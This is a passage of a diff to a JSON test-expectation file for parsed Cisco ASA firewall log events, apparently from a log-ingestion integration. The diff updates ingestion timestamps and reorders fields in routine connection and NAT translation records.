 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363942900Z",
+ "ingested": "2021-12-14T14:36:23.392335922Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -11615,7 +11615,7 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-09T13:31:36.363948Z",
+ "ingested": "2021-12-14T14:36:23.392336314Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94",
 "code": "302016",
 "kind": "event",
@@ -11697,7 +11697,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363952200Z",
+ "ingested": "2021-12-14T14:36:23.392336694Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293",
 "code": "305011",
 "kind": "event",
@@ -11776,7 +11776,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363957400Z",
+ "ingested": "2021-12-14T14:36:23.392337071Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)",
 "code": "302013",
 "kind": "event",
@@ -11862,7 +11862,7 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-09T13:31:36.363963500Z",
+ "ingested": "2021-12-14T14:36:23.392337463Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -11947,7 +11947,7 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-09T13:31:36.363968800Z",
+ "ingested": "2021-12-14T14:36:23.392337912Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -12030,7 +12030,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363973500Z",
+ "ingested": "2021-12-14T14:36:23.392338372Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -12115,7 +12115,7 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-09T13:31:36.363978300Z",
+ "ingested": "2021-12-14T14:36:23.392338762Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104",
 "code": "302016",
 "kind": "event",
@@ -12197,7 +12197,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363983900Z",
+ "ingested": "2021-12-14T14:36:23.392339144Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294",
 "code": "305011",
 "kind": "event",
@@ -12276,7 +12276,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.363987700Z",
+ "ingested": "2021-12-14T14:36:23.392339547Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)",
 "code": "302013",
 "kind": "event",
@@ -12361,7 +12361,7 @@
 "event": {
 "severity": 6,
 "duration": 3526000000000,
- "ingested": "2021-12-09T13:31:36.363992800Z",
+ "ingested": "2021-12-14T14:36:23.392339941Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512",
 "code": "302016",
 "kind": "event",
@@ -12385,22 +12385,16 @@
 }
 },
 {
- "process": {
- "name": "CiscoASA",
- "pid": 999
- },
- "log": {
- "level": "informational"
- },
- "tags": [
- "preserve_original_event"
- ],
 "observer": {
 "hostname": "localhost",
 "product": "asa",
 "type": "firewall",
 "vendor": "Cisco"
 },
+ "process": {
+ "name": "CiscoASA",
+ "pid": 999
+ },
 "@timestamp": "2018-10-10T12:34:56.000Z",
 "ecs": {
 "version": "1.12.0"
@@ -12410,12 +12404,15 @@
 "localhost"
 ]
 },
+ "log": {
+ "level": "informational"
+ },
 "host": {
 "hostname": "localhost"
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.364016400Z",
+ "ingested": "2021-12-14T14:36:23.392340486Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -12429,7 +12426,10 @@
 },
 "cisco": {
 "asa": {}
- }
+ },
+ "tags": [
+ "preserve_original_event"
+ ]
 },
 {
 "process": {
@@ -12491,7 +12491,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.364022800Z",
+ "ingested": "2021-12-14T14:36:23.392340873Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -12575,7 +12575,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.364050600Z",
+ "ingested": "2021-12-14T14:36:23.392341260Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -12660,7 +12660,7 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-09T13:31:36.364054500Z",
+ "ingested": "2021-12-14T14:36:23.392341649Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168",
 "code": "302016",
 "kind": "event",
@@ -12743,7 +12743,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:31:36.364058800Z",
+ "ingested": "2021-12-14T14:36:23.392342036Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -12828,7 +12828,7 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-09T13:31:36.364063900Z",
+ "ingested": "2021-12-14T14:36:23.392342430Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198",
 "code": "302016",
 "kind": "event",
@@ -12912,7 +12912,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.364068200Z", + "ingested": "2021-12-14T14:36:23.392343042Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", @@ -12995,7 +12995,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364073300Z", + "ingested": "2021-12-14T14:36:23.392343436Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -13080,7 +13080,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.364078100Z", + "ingested": "2021-12-14T14:36:23.392343834Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", "code": "302016", "kind": "event", @@ -13162,7 +13162,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364082500Z", + "ingested": "2021-12-14T14:36:23.392344219Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295", "code": "305011", "kind": "event", @@ -13241,7 +13241,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364086600Z", + "ingested": "2021-12-14T14:36:23.392344603Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", "code": "302013", "kind": "event", 
@@ -13325,7 +13325,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364107Z", + "ingested": "2021-12-14T14:36:23.392345309Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -13410,7 +13410,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.364112Z", + "ingested": "2021-12-14T14:36:23.392345724Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", "code": "302016", "kind": "event", @@ -13492,7 +13492,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364116700Z", + "ingested": "2021-12-14T14:36:23.392346155Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296", "code": "305011", "kind": "event", @@ -13571,7 +13571,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364121100Z", + "ingested": "2021-12-14T14:36:23.392346538Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", "code": "302013", "kind": "event", @@ -13654,7 +13654,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364125400Z", + "ingested": "2021-12-14T14:36:23.392347062Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297", "code": "305011", "kind": "event", 
@@ -13733,7 +13733,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364128900Z", + "ingested": "2021-12-14T14:36:23.392347493Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", "code": "302013", "kind": "event", @@ -13816,7 +13816,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364133400Z", + "ingested": "2021-12-14T14:36:23.392347879Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298", "code": "305011", "kind": "event", @@ -13895,7 +13895,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364139400Z", + "ingested": "2021-12-14T14:36:23.392350938Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", "code": "302013", "kind": "event", @@ -13981,7 +13981,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.364145300Z", + "ingested": "2021-12-14T14:36:23.392351425Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", "code": "302014", "kind": "event", @@ -14063,7 +14063,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364153400Z", + "ingested": "2021-12-14T14:36:23.392351832Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299", "code": "305011", "kind": "event", 
@@ -14142,7 +14142,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364158300Z", + "ingested": "2021-12-14T14:36:23.392352277Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", "code": "302013", "kind": "event", @@ -14225,7 +14225,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364162600Z", + "ingested": "2021-12-14T14:36:23.392352660Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300", "code": "305011", "kind": "event", @@ -14304,7 +14304,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364167300Z", + "ingested": "2021-12-14T14:36:23.392353056Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", "code": "302013", "kind": "event", @@ -14390,7 +14390,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.364172200Z", + "ingested": "2021-12-14T14:36:23.392353443Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", "code": "302014", "kind": "event", @@ -14475,7 +14475,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.364176800Z", + "ingested": "2021-12-14T14:36:23.392353834Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", "code": "302014", "kind": "event", 
@@ -14560,7 +14560,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.364181100Z", + "ingested": "2021-12-14T14:36:23.392354338Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", "code": "302014", "kind": "event", @@ -14642,7 +14642,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364185300Z", + "ingested": "2021-12-14T14:36:23.392354819Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301", "code": "305011", "kind": "event", @@ -14721,7 +14721,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364189900Z", + "ingested": "2021-12-14T14:36:23.392355201Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", "code": "302013", "kind": "event", @@ -14804,7 +14804,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364193600Z", + "ingested": "2021-12-14T14:36:23.392355589Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302", "code": "305011", "kind": "event", @@ -14883,7 +14883,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364197700Z", + "ingested": "2021-12-14T14:36:23.392355970Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", "code": "302013", "kind": "event", 
@@ -14967,7 +14967,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364201600Z", + "ingested": "2021-12-14T14:36:23.392356356Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -15052,7 +15052,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.364206200Z", + "ingested": "2021-12-14T14:36:23.392356915Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", @@ -15137,7 +15137,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.364210200Z", + "ingested": "2021-12-14T14:36:23.392357359Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", "code": "302014", "kind": "event", @@ -15219,7 +15219,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364215100Z", + "ingested": "2021-12-14T14:36:23.392357732Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303", "code": "305011", "kind": "event", @@ -15298,7 +15298,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364219200Z", + "ingested": "2021-12-14T14:36:23.392358108Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", "code": "302013", "kind": "event", 
@@ -15381,7 +15381,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364222800Z", + "ingested": "2021-12-14T14:36:23.392358506Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304", "code": "305011", "kind": "event", @@ -15460,7 +15460,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364226600Z", + "ingested": "2021-12-14T14:36:23.392358890Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", "code": "302013", "kind": "event", @@ -15546,7 +15546,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.364230800Z", + "ingested": "2021-12-14T14:36:23.392359300Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", "code": "302014", "kind": "event", @@ -15631,7 +15631,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.364257Z", + "ingested": "2021-12-14T14:36:23.392359681Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", "code": "302014", "kind": "event", @@ -15713,7 +15713,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364262300Z", + "ingested": "2021-12-14T14:36:23.392360081Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305", "code": "305011", "kind": "event", 
@@ -15792,7 +15792,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364267800Z", + "ingested": "2021-12-14T14:36:23.392360464Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", "code": "302013", "kind": "event", @@ -15875,7 +15875,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364273200Z", + "ingested": "2021-12-14T14:36:23.392360887Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306", "code": "305011", "kind": "event", @@ -15954,7 +15954,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364279300Z", + "ingested": "2021-12-14T14:36:23.392361275Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", "code": "302013", "kind": "event", @@ -15979,22 +15979,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16004,12 +15998,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364284100Z", + "ingested": "2021-12-14T14:36:23.392361672Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30", "code": "305012", "kind": "event", @@ -16023,25 +16020,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16051,12 +16045,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364305800Z", + "ingested": "2021-12-14T14:36:23.392362106Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30", "code": "305012", "kind": "event", @@ -16070,25 +16067,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16098,12 +16092,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364356600Z", + "ingested": "2021-12-14T14:36:23.392362496Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30", "code": "305012", "kind": "event", @@ -16117,25 +16114,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16145,12 +16139,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364361800Z", + "ingested": "2021-12-14T14:36:23.392362884Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30", "code": "305012", "kind": "event", @@ -16164,25 +16161,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16192,12 +16186,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364366Z", + "ingested": "2021-12-14T14:36:23.392363275Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30", "code": "305012", "kind": "event", @@ -16211,25 +16208,22 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16239,12 +16233,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364371200Z", + "ingested": "2021-12-14T14:36:23.392363790Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30", "code": "305012", "kind": "event", @@ -16258,25 +16255,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16286,12 +16280,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364375800Z", + "ingested": "2021-12-14T14:36:23.392364251Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30", "code": "305012", "kind": "event", @@ -16305,25 +16302,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16333,12 +16327,15 @@ 